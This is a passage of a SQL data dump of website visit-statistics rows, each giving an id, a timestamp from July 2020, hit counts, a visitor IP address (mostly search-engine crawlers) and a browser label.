hrome'),(519818,1593845806,1,0,1,0,'66.249.70.69',''),(519819,1593846025,1,1,0,0,'66.249.70.70','chrome'),(519820,1593846688,2,2,0,0,'66.249.70.69','chrome'),(519821,1593847555,1,1,0,0,'66.249.70.72','chrome'),(519822,1593847995,1,1,0,0,'157.55.39.64','other'),(519823,1593848042,1,1,0,0,'157.55.39.166','other'),(519824,1593848077,1,1,0,0,'207.46.13.114','other'),(519825,1593848574,1,1,0,0,'66.249.64.36','chrome'),(519826,1593848938,1,1,0,0,'66.249.64.33','chrome'),(519827,1593849326,2,1,1,0,'66.249.70.70',''),(519828,1593850328,1,1,0,0,'91.209.11.236','other'),(519829,1593850498,1,1,0,0,'207.46.13.114','other'),(519830,1593850509,1,1,0,0,'157.55.39.166','other'),(519831,1593850908,1,1,0,0,'66.249.70.72','chrome'),(519832,1593851046,1,1,0,0,'159.224.177.211','chrome'),(519833,1593851727,2,2,0,0,'8.29.198.25','other'),(519834,1593852815,1,1,0,0,'5.45.37.17','chrome'),(519835,1593853130,1,1,0,0,'157.55.39.166','other'),(519836,1593853215,1,1,0,0,'37.78.74.71','chrome'),(519837,1593853339,1,1,0,0,'66.249.70.72','chrome'),(519838,1593855049,1,1,0,0,'66.249.70.72','chrome'),(519839,1593855792,1,1,0,0,'207.46.13.154','other'),(519840,1593856093,1,1,0,0,'157.55.39.64','other'),(519841,1593856723,3,3,0,0,'207.46.13.88','other'),(519842,1593856818,1,1,0,0,'207.46.13.154','other'),(519843,1593857044,8,8,0,0,'185.11.82.228','other'),(519844,1593858142,2,2,0,0,'66.249.70.70','chrome'),(519845,1593858162,1,1,0,0,'157.55.39.53','other'),(519846,1593858550,8,8,0,0,'185.11.82.228','other'),(519847,1593858686,1,1,0,0,'157.55.39.64','other'),(519848,1593859514,1,1,0,0,'157.55.39.53','other'),(519849,1593859785,1,1,0,0,'66.249.70.70','chrome'),(519850,1593859965,1,1,0,0,'109.74.154.72','chrome'),(519851,1593859983,1,1,0,0,'59.153.145.242','chrome'),(519852,1593860257,2,2,0,0,'66.249.64.38','chrome'),(519853,1593860359,8,8,0,0,'185.11.82.228','other'),(519854,1593860617,1,1,0,0,'66.249.70.69','chrome'),(519855,1593860787,1,1,0,0,'207.46.13.154','other'),(519856,1593860798,2,2,0,0,'77.247.110.50','chrome'),(519857,1593860994,1,1,0,0,'157.55.39.58','other'),(519858,1593861578,1,1,0,0,'66.249.64.33','chrome'),(519859,1593861881,1,1,0,0,'157.55.39.64','other'),(519860,1593862166,1,1,0,0,'157.55.39.166','other'),(519861,1593862554,1,1,0,0,'8.29.198.25','other'),(519862,1593862632,8,8,0,0,'185.11.82.228','other'),(519863,1593862708,1,1,0,0,'8.29.198.26','other'),(519864,1593863530,1,1,0,0,'157.55.39.58','other'),(519865,1593864232,1,1,0,0,'66.249.64.38','chrome'),(519866,1593865197,8,8,0,0,'185.11.82.228','other'),(519867,1593865199,1,1,0,0,'157.55.39.58','other'),(519868,1593865956,1,1,0,0,'157.55.39.166','other'),(519869,1593866037,1,1,0,0,'66.249.70.72','chrome'),(519870,1593866184,1,1,0,0,'91.203.167.152','chrome'),(519871,1593866741,1,1,0,0,'207.46.13.154','other'),(519872,1593866852,1,1,0,0,'207.46.13.114','other'),(519873,1593868796,8,8,0,0,'185.11.82.228','other'),(519874,1593869934,1,1,0,0,'178.154.200.222','other'),(519875,1593870423,1,1,0,0,'178.154.200.222','chrome'),(519876,1593870983,1,1,0,0,'91.209.11.236','other'),(519877,1593871300,1,1,0,0,'192.71.10.105','other'),(519878,1593872208,1,1,0,0,'66.249.70.72','chrome'),(519879,1593872488,1,1,0,0,'157.55.39.58','other'),(519880,1593872824,1,1,0,0,'66.249.64.38','chrome'),(519881,1593872900,1,1,0,0,'178.154.200.92','other'),(519882,1593873384,2,2,0,0,'8.29.198.26','other'),(519883,1593873591,1,1,0,0,'66.249.70.70','chrome'),(519884,1593873603,1,1,0,0,'178.154.200.222','chrome'),(519885,1593873616,1,1,0,0,'66.249.70.69','chrome'),(519886,1593873690,1,1,0,0,'178.154.200.222','other'),(519887,1593873691,1,1,0,0,'31.173.86.216','chrome'),(519888,1593873735,2,2,0,0,'207.46.13.154','other'),(519889,1593874090,1,1,0,0,'92.38.136.69','chrome'),(519890,1593874528,1,1,0,0,'5.45.207.184','other'),(519891,1593874529,1,1,0,0,'5.45.207.89','other'),(519892,1593874630,8,8,0,0,'185.11.82.228','other'),(519893,1593874823,1,1,0,0,'157.55.39.53','other'),(519894,1593874946,1,1,0,0,'66.249.70.70','chrome'),(519895,1593875055,1,1,0,0,'178.154.200.236','chrome'),(519896,1593875200,1,1,0,0,'207.46.13.154','other'),(519897,1593875283,1,1,0,0,'178.154.200.112','other'),(519898,1593875865,1,1,0,0,'66.249.70.70','chrome'),(519899,1593875921,1,1,0,0,'157.55.39.64','other'),(519900,1593877446,1,1,0,0,'5.255.253.82','chrome'),(519901,1593877458,1,1,0,0,'178.154.200.236','chrome'),(519902,1593877758,1,1,0,0,'178.154.200.222','chrome'),(519903,1593878819,1,1,0,0,'207.46.13.154','other'),(519904,1593878970,1,1,0,0,'5.45.36.111','chrome'),(519905,1593879084,1,1,0,0,'178.154.200.92','other'),(519906,1593879607,1,1,0,0,'178.154.200.222','chrome'),(519907,1593879773,1,1,0,0,'66.249.64.36','chrome'),(519908,1593881030,1,1,0,0,'213.180.203.95','other'),(519909,1593881294,1,1,0,0,'5.181.131.138','chrome'),(519910,1593881973,1,1,0,0,'66.249.70.70','chrome'),(519911,1593882010,1,1,0,0,'157.55.39.58','other'),(519912,1593882220,1,1,0,0,'209.17.96.218','other'),(519913,1593882481,3,3,0,0,'66.249.70.72','chrome'),(519914,1593883170,1,1,0,0,'66.249.70.70','chrome'),(519915,1593883399,1,1,0,0,'66.249.70.69','chrome'),(519916,1593883630,1,1,0,0,'157.55.39.166','other'),(519917,1593883880,1,1,0,0,'178.154.200.97','chrome'),(519918,1593883934,1,1,0,0,'213.180.203.16','other'),(519919,1593884214,2,2,0,0,'8.29.198.25','other'),(519920,1593884917,1,1,0,0,'66.249.70.72','chrome'),(519921,1593885082,1,1,0,0,'178.154.200.220','chrome'),(519922,1593885218,1,1,0,0,'178.154.200.236','other'),(519923,1593885770,1,1,0,0,'157.55.39.64','other'),(519924,1593886254,1,1,0,0,'66.249.70.69','chrome'),(519925,1593887709,1,1,0,0,'178.154.200.92','other'),(519926,1593888138,1,1,0,0,'157.55.39.166','other'),(519927,1593888250,1,1,0,0,'91.196.178.38','chrome'),(519928,1593888942,1,1,0,0,'66.249.70.72','chrome'),(519929,1593889100,8,8,0,0,'185.11.82.228','other'),(519930,1593889217,1,1,0,0,'178.154.200.19','other'),(519931,1593889223,1,1,0,0,'178.154.200.92','other'),(519932,1593889491,1,1,0,0,'157.55.39.58','other'),(519933,1593889692,1,1,0,0,'213.180.203.95','chrome'),(519934,1593889909,1,1,0,0,'178.154.200.222','other'),(519935,1593890062,1,1,0,0,'66.249.64.38','chrome'),(519936,1593890886,1,1,0,0,'46.211.83.215','chrome'),(519937,1593891265,8,8,0,0,'185.11.82.228','other'),(519938,1593891566,1,1,0,0,'213.180.203.16','chrome'),(519939,1593892558,1,1,0,0,'66.249.70.70','chrome'),(519940,1593893060,1,1,0,0,'157.55.39.53','other'),(519941,1593893064,1,1,0,0,'157.55.39.64','other'),(519942,1593893086,6,6,0,0,'207.46.13.154','other'),(519943,1593893235,1,1,0,0,'157.55.39.166','other'),(519944,1593893488,8,8,0,0,'185.11.82.228','other'),(519945,1593893576,2,2,0,0,'178.154.200.222','chrome'),(519946,1593893929,3,3,0,0,'157.55.39.58','other'),(519947,1593894766,1,1,0,0,'157.55.39.53','other'),(519948,1593895045,1,1,0,0,'8.29.198.25','other'),(519949,1593895057,2,2,0,0,'207.46.13.154','other'),(519950,1593895186,1,1,0,0,'8.29.198.26','other'),(519951,1593895467,1,1,0,0,'178.154.200.220','chrome'),(519952,1593895643,1,1,0,0,'213.180.203.16','chrome'),(519953,1593895999,8,8,0,0,'185.11.82.228','other'),(519954,1593896223,1,1,0,0,'178.154.200.222','chrome'),(519955,1593896403,1,1,0,0,'66.249.70.70','chrome'),(519956,1593897407,1,1,0,0,'66.249.70.70','chrome'),(519957,1593897707,1,1,0,0,'194.61.24.94','other'),(519958,1593898138,1,1,0,0,'213.180.203.16','chrome'),(519959,1593898169,1,1,0,0,'178.154.200.196','chrome'),(519960,1593898921,1,1,0,0,'66.249.70.72','chrome'),(519961,1593898941,1,1,0,0,'207.46.13.154','other'),(519962,1593899090,2,2,0,0,'213.180.203.16','chrome'),(519963,1593899319,1,1,0,0,'178.154.200.220','chrome'),(519964,1593899436,1,1,0,0,'194.34.133.211','chrome'),(519965,1593899503,8,8,0,0,'185.11.82.228','other'),(519966,1593899627,2,2,0,0,'157.55.39.64','other'),(519967,1593900775,1,1,0,0,'157.55.39.58','other'),(519968,1593900954,1,1,0,0,'178.154.200.222','other'),(519969,1593900998,1,1,0,0,'157.55.39.53','other'),(519970,1593901217,1,1,0,0,'213.180.203.16','chrome'),(519971,1593901277,1,1,0,0,'66.249.64.36','chrome'),(519972,1593901703,1,0,1,0,'66.249.70.72',''),(519973,1593902035,1,1,0,0,'66.249.70.70','chrome'),(519974,1593902373,1,1,0,0,'178.154.200.92','other'),(519975,1593902476,1,1,0,0,'207.46.13.154','other'),(519976,1593902938,1,1,0,0,'178.154.200.97','chrome'),(519977,1593903039,1,1,0,0,'157.55.39.64','other'),(519978,1593903862,1,1,0,0,'157.55.39.58','other'),(519979,1593904130,8,8,0,0,'185.11.82.228','other'),(519980,1593904139,1,1,0,0,'66.249.64.36','chrome'),(519981,1593904878,1,1,0,0,'157.55.39.64','other'),(519982,1593904954,1,1,0,0,'157.55.39.166','other'),(519983,1593905146,1,1,0,0,'37.192.137.95','chrome'),(519984,1593905549,1,1,0,0,'5.255.253.82','chrome'),(519985,1593905851,1,1,0,0,'18.222.240.231','chrome'),(519986,1593905862,1,1,0,0,'178.154.200.220','chrome'),(519987,1593905871,2,2,0,0,'8.29.198.25','other'),(519988,1593906904,1,1,0,0,'62.205.134.182','other'),(519989,1593907049,1,1,0,0,'157.55.39.166','other'),(519990,1593907237,1,1,0,0,'66.249.70.69','chrome'),(519991,1593908641,1,1,0,0,'178.154.200.222','chrome'),(519992,1593908822,1,1,0,0,'157.55.39.64','other'),(519993,1593909468,1,1,0,0,'5.255.253.111','chrome'),(519994,1593909696,1,1,0,0,'207.46.13.154','other'),(519995,1593909710,1,1,0,0,'66.249.70.70','chrome'),(519996,1593910314,1,1,0,0,'213.180.203.122','other'),(519997,1593910681,1,1,0,0,'66.249.64.36','chrome'),(519998,1593910774,1,1,0,0,'178.154.200.196','chrome'),(519999,1593911874,8,8,0,0,'185.11.82.228','other'),(520000,1593912096,1,1,0,0,'66.249.70.70','chrome'),(520001,1593912341,1,1,0,0,'95.152.63.179','chrome'),(520002,1593912691,1,1,0,0,'213.180.203.16','chrome'),(520003,1593913280,1,1,0,0,'207.46.13.154','other'),(520004,1593914017,16,16,0,0,'185.219.40.151','other'),(520005,1593914690,1,1,0,0,'157.55.39.53','other'),(520006,1593914732,10,10,0,0,'78.85.130.69','chrome'),(520007,1593915621,1,1,0,0,'66.249.70.72','chrome'),(520008,1593916073,3,3,0,0,'207.46.13.154','other'),(520009,1593916253,1,1,0,0,'157.55.39.166','other'),(520010,1593916709,2,2,0,0,'8.29.198.25','other'),(520011,1593916782,1,1,0,0,'157.55.39.58','other'),(520012,1593917515,1,1,0,0,'157.55.39.166','other'),(520013,1593917573,2,2,0,0,'66.249.70.72','chrome'),(520014,1593917771,1,1,0,0,'66.249.64.38','chrome'),(520015,1593917871,1,1,0,0,'66.249.70.70','chrome'),(520016,1593918310,1,1,0,0,'178.159.37.88','chrome'),(520017,1593918727,1,1,0,0,'213.180.203.140','other'),(520018,1593919378,1,1,0,0,'66.249.70.72','chrome'),(520019,1593920621,1,1,0,0,'178.154.200.222','chrome'),(520020,1593920809,1,1,0,0,'103.12.50.215','chrome'),(520021,1593920865,1,1,0,0,'213.180.203.16','other'),(520022,1593920926,2,2,0,0,'157.55.39.166','other'),(520023,1593921109,1,1,0,0,'213.180.203.16','chrome'),(520024,1593921984,1,1,0,0,'66.249.70.70','chrome'),(520025,1593922255,1,1,0,0,'178.154.200.97','chrome'),(520026,1593922308,1,1,0,0,'213.180.203.16','chrome'),(520027,1593922333,2,2,0,0,'157.55.39.64','other'),(520028,1593923143,1,1,0,0,'66.249.70.70','chrome'),(520029,1593923453,1,1,0,0,'66.249.70.69','chrome'),(520030,1593923658,1,1,0,0,'131.220.6.152','chrome'),(520031,1593923703,1,1,0,0,'207.46.13.154','other'),(520032,1593923975,1,1,0,0,'178.154.200.97','chrome'),(520033,1593924176,1,1,0,0,'5.45.37.218','chrome'),(520034,1593924656,1,1,0,0,'178.154.200.222','chrome'),(520035,1593924864,8,8,0,0,'185.11.82.228','other'),(520036,1593925111,1,1,0,0,'66.249.70.69','chrome'),(520037,1593925127,1,1,0,0,'62.205.134.182','other'),(520038,1593925878,1,1,0,0,'157.55.39.53','other'),(520039,1593925934,1,1,0,0,'178.154.200.196','chrome'),(520040,1593926026,1,1,0,0,'66.249.70.70','chrome'),(520041,1593926851,8,8,0,0,'185.11.82.228','other'),(520042,1593927016,3,3,0,0,'35.232.144.213','chrome'),(520043,1593927161,1,1,0,0,'66.249.70.72','chrome'),(520044,1593927565,1,1,0,0,'8.29.198.27','other'),(520045,1593927587,1,1,0,0,'66.249.70.69','chrome'),(520046,1593927660,1,1,0,0,'178.154.200.222','other'),(520047,1593927678,1,1,0,0,'8.29.198.25','other'),(520048,1593928001,1,1,0,0,'157.55.39.166','other'),(520049,1593928161,1,1,0,0,'182.22.27.13','other'),(520050,1593928494,1,1,0,0,'213.180.203.29','chrome'),(520051,1593928984,8,8,0,0,'185.11.82.228','other'),(520052,1593929265,1,1,0,0,'66.249.70.72','chrome'),(520053,1593929855,1,1,0,0,'178.154.200.222','chrome'),(520054,1593930034,1,1,0,0,'207.46.13.154','other'),(520055,1593930894,1,1,0,0,'157.55.39.166','other'),(520056,1593931046,1,1,0,0,'157.55.39.64','other'),(520057,1593931169,8,8,0,0,'185.11.82.228','other'),(520058,1593931232,1,1,0,0,'157.55.39.53','other'),(520059,1593931540,1,1,0,0,'66.249.64.33','chrome'),(520060,1593931548,1,1,0,0,'66.249.64.36','chrome'),(520061,1593932080,2,2,0,0,'178.154.200.222','chrome'),(520062,1593932717,2,2,0,0,'207.46.13.154','other'),(520063,1593933153,1,1,0,0,'157.55.39.53','other'),(520064,1593933516,1,1,0,0,'157.55.39.58','other'),(520065,1593933539,8,8,0,0,'185.11.82.228','other'),(520066,1593933725,1,1,0,0,'66.249.70.70','chrome'),(520067,1593933768,1,1,0,0,'66.249.70.69','chrome'),(520068,1593935269,1,1,0,0,'213.180.203.16','chrome'),(520069,1593935415,1,1,0,0,'66.249.70.69','chrome'),(520070,1593935962,1,1,0,0,'66.249.70.70','chrome'),(520071,1593936147,1,1,0,0,'213.180.203.17','chrome'),(520072,1593936380,1,1,0,0,'157.55.39.166','other'),(520073,1593936453,3,3,0,0,'66.249.70.72','chrome'),(520074,1593936714,8,8,0,0,'185.11.82.228','other'),(520075,1593937331,1,1,0,0,'178.154.200.222','chrome'),(520076,1593937370,1,1,0,0,'66.249.64.33','chrome'),(520077,1593937419,1,1,0,0,'157.55.39.166','other'),(520078,1593937611,1,1,0,0,'66.249.70.72','chrome'),(520079,1593938206,1,1,0,0,'178.154.200.97','chrome'),(520080,1593938401,2,2,0,0,'8.29.198.25','other'),(520081,1593939377,1,1,0,0,'46.211.34.47','chrome'),(520082,1593939502,1,1,0,0,'66.249.70.69','chrome'),(520083,1593940450,1,1,0,0,'66.249.70.70','chrome'),(520084,1593940460,2,2,0,0,'66.249.70.69','chrome'),(520085,1593940577,1,1,0,0,'178.154.200.222','other'),(520086,1593940696,1,1,0,0,'157.55.39.53','other'),(520087,1593940700,8,8,0,0,'185.11.82.228','other'),(520088,1593941196,2,2,0,0,'157.55.39.64','other'),(520089,1593941432,1,1,0,0,'213.180.203.95','chrome'),(520090,1593941508,1,1,0,0,'91.196.178.179','chrome'),(520091,1593942153,2,2,0,0,'178.154.200.222','chrome'),(520092,1593942433,1,1,0,0,'91.196.178.122','chrome'),(520093,1593942842,1,1,0,0,'178.154.200.222','other'),(520094,1593944246,2,2,0,0,'66.249.70.69','chrome'),(520095,1593944818,1,1,0,0,'178.154.200.222','chrome'),(520096,1593945274,1,1,0,0,'66.249.70.72','chrome'),(520097,1593945585,1,1,0,0,'157.55.39.53','other'),(520098,1593946046,1,1,0,0,'178.154.200.220','chrome'),(520099,1593946635,1,1,0,0,'109.74.154.72','chrome'),(520100,1593946714,8,8,0,0,'185.11.82.228','other'),(520101,1593947045,1,1,0,0,'66.249.70.69','chrome'),(520102,1593947051,2,2,0,0,'66.249.70.70','chrome'),(520103,1593948079,1,1,0,0,'5.255.253.82','chrome'),(520104,1593948095,2,2,0,0,'157.55.39.53','other'),(520105,1593948217,1,1,0,0,'178.154.200.220','chrome'),(520106,1593948730,1,1,0,0,'66.249.70.69','chrome'),(520107,1593949230,2,2,0,0,'8.29.198.27','other'),(520108,1593949345,2,2,0,0,'157.55.39.53','other'),(520109,1593949399,1,1,0,0,'213.180.203.16','chrome'),(520110,1593949520,1,1,0,0,'37.143.63.162','chrome'),(520111,1593950563,1,1,0,0,'157.55.39.166','other'),(520112,1593950811,1,1,0,0,'66.249.64.36','chrome'),(520113,1593951606,1,1,0,0,'213.180.203.95','other'),(520114,1593951751,1,1,0,0,'157.55.39.53','other'),(520115,1593952179,1,1,0,0,'178.154.200.222','other'),(520116,1593952765,1,1,0,0,'66.249.70.69','chrome'),(520117,1593952918,2,2,0,0,'207.46.13.154','other'),(520118,1593953511,1,1,0,0,'66.249.70.70','chrome'),(520119,1593954029,1,1,0,0,'66.249.70.72','chrome'),(520120,1593954692,1,1,0,0,'178.154.200.112','other'),(520121,1593954783,1,1,0,0,'157.55.39.64','other'),(520122,1593955394,1,1,0,0,'66.249.70.72','chrome'),(520123,1593955601,1,1,0,0,'207.46.13.154','other'),(520124,1593957015,2,2,0,0,'66.249.70.70','chrome'),(520125,1593957133,1,1,0,0,'207.46.13.154','other'),(520126,1593958657,2,2,0,0,'66.249.70.70','chrome'),(520127,1593958872,2,2,0,0,'66.249.70.72','chrome'),(520128,1593958952,1,1,0,0,'178.154.200.222','other'),(520129,1593959803,1,1,0,0,'157.55.39.53','other'),(520130,1593960061,2,2,0,0,'8.29.198.27','other'),(520131,1593960621,1,1,0,0,'66.249.70.70','chrome'),(520132,1593960667,1,1,0,0,'66.249.70.72','chrome'),(520133,1593960714,2,2,0,0,'157.55.39.58','other'),(520134,1593961792,1,1,0,0,'91.196.178.108','chrome'),(520135,1593961809,8,8,0,0,'185.11.82.228','other'),(520136,1593963133,1,1,0,0,'178.154.200.222','other'),(520137,1593963315,8,8,0,0,'185.11.82.228','other'),(520138,1593963944,6,6,0,0,'3.81.28.10','other'),(520139,1593964238,2,2,0,0,'66.249.70.70','chrome'),(520140,1593964584,1,1,0,0,'207.46.13.154','other'),(520141,1593964677,1,1,0,0,'188.191.233.57','chrome'),(520142,1593964854,7,7,0,0,'3.81.28.10','other'),(520143,1593964994,3,3,0,0,'66.249.70.69','chrome'),(520144,1593965049,8,8,0,0,'185.11.82.228','other'),(520145,1593965755,9,9,0,0,'3.81.28.10','other'),(520146,1593966071,1,1,0,0,'157.55.39.53','other'),(520147,1593966731,10,10,0,0,'3.81.28.10','other'),(520148,1593966796,8,8,0,0,'185.11.82.228','other'),(520149,1593967464,1,1,0,0,'178.154.200.222','other'),(520150,1593967953,3,3,0,0,'3.81.28.10','other'),(520151,1593968856,1,0,1,0,'66.249.70.70',''),(520152,1593968895,8,8,0,0,'185.11.82.228','other'),(520153,1593968930,2,2,0,0,'3.81.28.10','other'),(520154,1593968993,2,2,0,0,'66.249.70.70','chrome'),(520155,1593969660,1,1,0,0,'207.46.13.154','other'),(520156,1593969862,2,2,0,0,'66.249.70.72','chrome'),(520157,1593970109,1,1,0,0,'45.89.241.229','chrome'),(520158,1593970122,10,10,0,0,'3.81.28.10','other'),(520159,1593970896,2,2,0,0,'8.29.198.25','other'),(520160,1593971189,6,6,0,0,'3.81.28.10','other'),(520161,1593971380,8,8,0,0,'185.11.82.228','other'),(520162,1593971750,2,2,0,0,'66.249.70.70','chrome'),(520163,1593972149,1,1,0,0,'178.154.200.220','other'),(520164,1593972210,1,1,0,0,'66.249.64.33','chrome'),(520165,1593972380,3,3,0,0,'3.81.28.10','other'),(520166,1593972465,2,2,0,0,'66.249.70.69','chrome'),(520167,1593972866,1,1,0,0,'66.249.70.72','chrome'),(520168,1593973317,1,1,0,0,'178.154.200.222','other'),(520169,1593973356,1,1,0,0,'66.249.64.36','chrome'),(520170,1593973432,2,2,0,0,'66.249.70.69','chrome'),(520171,1593974450,1,1,0,0,'207.46.13.154','other'),(520172,1593974538,8,8,0,0,'185.11.82.228','other'),(520173,1593974541,1,1,0,0,'194.61.24.94','other'),(520174,1593975005,3,3,0,0,'66.249.70.69','chrome'),(520175,1593975506,1,1,0,0,'66.249.64.36','chrome'),(520176,1593975682,3,3,0,0,'66.249.70.70','chrome'),(520177,1593975942,2,2,0,0,'66.249.70.72','chrome'),(520178,1593975944,1,1,0,0,'207.46.13.154','other'),(520179,1593976323,2,2,0,0,'66.249.70.69','chrome'),(520180,1593976989,1,1,0,0,'45.158.246.251','chrome'),(520181,1593977585,1,1,0,0,'66.249.70.69','chrome'),(520182,1593978152,1,1,0,0,'207.46.13.154','other'),(520183,1593978346,1,1,0,0,'66.249.70.70','chrome'),(520184,1593978555,1,1,0,0,'178.154.200.220','other'),(520185,1593978775,1,1,0,0,'157.55.39.58','other'),(520186,1593978921,2,2,0,0,'66.249.70.69','chrome'),(520187,1593979113,8,8,0,0,'185.11.82.228','other'),(520188,1593979126,1,1,0,0,'37.203.10.3','chrome'),(520189,1593979240,2,2,0,0,'178.154.200.222','other'),(520190,1593979679,2,2,0,0,'216.18.204.150','firefox'),(520191,1593981398,1,1,0,0,'66.249.70.69','chrome'),(520192,1593981745,1,1,0,0,'8.29.198.25','other'),(520193,1593981870,1,1,0,0,'8.29.198.27','other'),(520194,1593982339,1,1,0,0,'178.154.200.196','other'),(520195,1593983424,1,1,0,0,'157.55.39.64','other'),(520196,1593984191,1,1,0,0,'5.106.15.254','other'),(520197,1593984241,3,3,0,0,'178.154.200.222','other'),(520198,1593984307,1,1,0,0,'165.227.184.177','other'),(520199,1593984514,1,1,0,0,'66.249.64.38','chrome'),(520200,1593984901,1,1,0,0,'66.249.64.36','chrome'),(520201,1593985040,1,1,0,0,'66.249.70.70','chrome'),(520202,1593985426,1,1,0,0,'45.55.58.53','other'),(520203,1593986524,1,1,0,0,'157.55.39.64','other'),(520204,1593986633,1,1,0,0,'213.180.203.16','other'),(520205,1593986770,1,1,0,0,'157.55.39.111','other'),(520206,1593987025,1,1,0,0,'157.55.39.53','other'),(520207,1593987201,1,1,0,0,'89.19.48.111','chrome'),(520208,1593987582,1,1,0,0,'66.249.70.72','chrome'),(520209,1593988007,2,2,0,0,'66.249.70.70','chrome'),(520210,1593988747,1,1,0,0,'66.249.70.72','chrome'),(520211,1593988749,8,8,0,0,'185.11.82.228','other'),(520212,1593988925,1,1,0,0,'66.249.70.69','chrome'),(520213,1593988962,2,2,0,0,'66.249.70.70','chrome'),(520214,1593989945,1,1,0,0,'66.249.70.69','chrome'),(520215,1593990605,4,4,0,0,'157.55.39.58','other'),(520216,1593990767,2,2,0,0,'157.55.39.53','other'),(520217,1593990843,1,1,0,0,'213.180.203.16','other'),(520218,1593991393,1,1,0,0,'207.46.13.154','other'),(520219,1593991410,1,1,0,0,'157.55.39.64','other'),(520220,1593991490,1,1,0,0,'91.196.178.97','chrome'),(520221,1593991598,1,1,0,0,'178.154.200.222','other'),(520222,1593991810,1,1,0,0,'157.55.39.53','other'),(520223,1593991968,1,1,0,0,'66.249.70.70','chrome'),(520224,1593992578,2,2,0,0,'8.29.198.25','other'),(520225,1593992701,1,1,0,0,'207.46.13.154','other'),(520227,1593992991,1,1,0,0,'66.249.70.69','chrome'),(520228,1593993089,1,1,0,0,'66.249.70.70','chrome'),(520229,1593993127,31,31,0,0,'5.180.62.121','msie'),(520230,1593993129,1,1,0,0,'66.249.64.36','chrome'),(520231,1593993307,1,1,0,0,'62.205.134.182','other'),(520232,1593994240,38,38,0,0,'5.180.62.121','msie'),(520233,1593994685,2,2,0,0,'66.249.70.72','chrome'),(520234,1593994907,1,1,0,0,'66.249.64.33','chrome'),(520235,1593995155,19,19,0,0,'5.180.62.121','msie'),(520236,1593995405,1,1,0,0,'5.9.70.117','other'),(520237,1593996201,1,1,0,0,'157.55.39.111','other'),(520238,1593996433,1,1,0,0,'178.154.200.196','other'),(520239,1593996745,1,1,0,0,'66.249.70.72','chrome'),(520240,1593997725,1,1,0,0,'66.249.64.36','chrome'),(520241,1593997785,8,8,0,0,'185.11.82.228','other'),(520242,1593997849,2,2,0,0,'66.249.70.72','chrome'),(520243,1593998432,1,1,0,0,'66.249.70.69','chrome'),(520244,1593998735,2,2,0,0,'66.249.70.70','chrome'),(520245,1593998954,1,1,0,0,'157.55.39.53','other'),(520246,1593999177,2,2,0,0,'157.55.39.111','other'),(520247,1593999206,1,1,0,0,'66.249.70.72','chrome'),(520248,1593999298,8,8,0,0,'185.11.82.228','other'),(520249,1594000942,8,8,0,0,'185.11.82.228','other'),(520250,1594001150,1,1,0,0,'66.249.64.38','chrome'),(520251,1594002342,2,2,0,0,'66.249.70.69','chrome'),(520252,1594002430,1,1,0,0,'66.249.70.70','chrome'),(520253,1594002767,1,1,0,0,'178.154.200.112','other'),(520254,1594002819,8,8,0,0,'185.11.82.228','other'),(520255,1594003027,1,1,0,0,'66.249.70.72','chrome'),(520256,1594003401,1,1,0,0,'157.55.39.45','other'),(520257,1594003410,2,2,0,0,'8.29.198.25','other'),(520258,1594003995,1,1,0,0,'213.180.203.140','other'),(520259,1594004365,1,1,0,0,'66.249.64.33','chrome'),(520260,1594004850,3,3,0,0,'66.249.70.72','chrome'),(520261,1594005064,8,8,0,0,'185.11.82.228','other'),(520262,1594005651,1,1,0,0,'157.55.39.64','other'),(520263,1594005798,1,1,0,0,'207.46.13.85','other'),(520264,1594005858,1,1,0,0,'89.19.48.184','chrome'),(520265,1594006338,1,1,0,0,'207.46.13.154','other'),(520266,1594006759,1,1,0,0,'66.249.70.69','chrome'),(520267,1594006950,2,2,0,0,'157.55.39.45','other'),(520268,1594007256,1,1,0,0,'178.154.200.222','other'),(520269,1594007510,1,1,0,0,'66.249.70.72','chrome'),(520270,1594007810,1,1,0,0,'66.249.70.70','chrome'),(520271,1594007997,8,8,0,0,'185.11.82.228','other'),(520272,1594008952,1,1,0,0,'207.46.13.85','other'),(520273,1594009618,1,1,0,0,'66.249.70.69','chrome'),(520274,1594010115,1,1,0,0,'5.45.37.32','chrome'),(520275,1594010390,1,1,0,0,'178.128.48.87','firefox'),(520276,1594010408,1,1,0,0,'131.220.6.152','chrome'),(520277,1594010466,1,1,0,0,'213.180.203.95','other'),(520278,1594010690,1,1,0,0,'66.249.70.70','chrome'),(520279,1594010840,1,1,0,0,'157.55.39.53','other'),(520280,1594010942,2,2,0,0,'66.249.70.72','chrome'),(520281,1594011259,1,1,0,0,'207.46.13.154','other'),(520282,1594011269,1,1,0,0,'62.205.134.182','other'),(520283,1594012120,1,1,0,0,'66.249.70.72','chrome'),(520284,1594012829,1,1,0,0,'207.46.13.85','other'),(520285,1594013069,1,1,0,0,'212.1.124.210','chrome'),(520286,1594013202,2,2,0,0,'66.249.70.72','chrome'),(520287,1594013300,1,1,0,0,'178.154.200.222','other'),(520288,1594013350,1,1,0,0,'66.249.70.70','chrome'),(520289,1594013435,8,8,0,0,'185.11.82.228','other'),(520290,1594013651,2,2,0,0,'157.55.39.58','other'),(520291,1594014256,1,1,0,0,'8.29.198.27','other'),(520292,1594014299,1,1,0,0,'178.154.200.222','other'),(520293,1594014909,1,1,0,0,'8.29.198.26','other'),(520294,1594014988,1,1,0,0,'66.249.70.70','chrome'),(520295,1594015403,2,2,0,0,'207.46.13.85','other'),(520296,1594016509,1,1,0,0,'207.46.13.154','other'),(520297,1594016819,2,2,0,0,'157.55.39.53','other'),(520298,1594017145,1,1,0,0,'91.196.178.69','chrome'),(520299,1594017406,1,1,0,0,'66.249.70.69','chrome'),(520300,1594018530,2,1,1,0,'66.249.70.70',''),(520301,1594018751,1,1,0,0,'5.45.36.248','chrome'),(520302,1594019668,1,1,0,0,'66.249.70.69','chrome'),(520303,1594020503,2,2,0,0,'178.154.200.222','other'),(520304,1594020917,1,1,0,0,'207.46.13.85','other'),(520305,1594021835,1,1,0,0,'66.249.70.70','chrome'),(520306,1594021905,4,4,0,0,'35.175.133.127','other'),(520307,1594022265,1,1,0,0,'157.55.39.64','other'),(520308,1594022335,1,1,0,0,'157.55.39.45','other'),(520309,1594022853,5,5,0,0,'35.175.133.127','other'),(520310,1594023439,1,0,1,0,'66.249.70.69',''),(520311,1594023976,1,1,0,0,'37.143.62.121','chrome'),(520312,1594024034,1,1,0,0,'157.55.39.45','other'),(520313,1594024228,4,4,0,0,'35.175.133.127','other'),(520314,1594024613,8,8,0,0,'185.11.82.228','other'),(520315,1594024829,2,2,0,0,'91.196.178.75','chrome'),(520316,1594025093,2,2,0,0,'8.29.198.25','other'),(520317,1594025220,5,5,0,0,'35.175.133.127','other'),(520318,1594025351,1,1,0,0,'213.108.47.26','chrome'),(520319,1594025618,2,2,0,0,'66.249.64.38','chrome')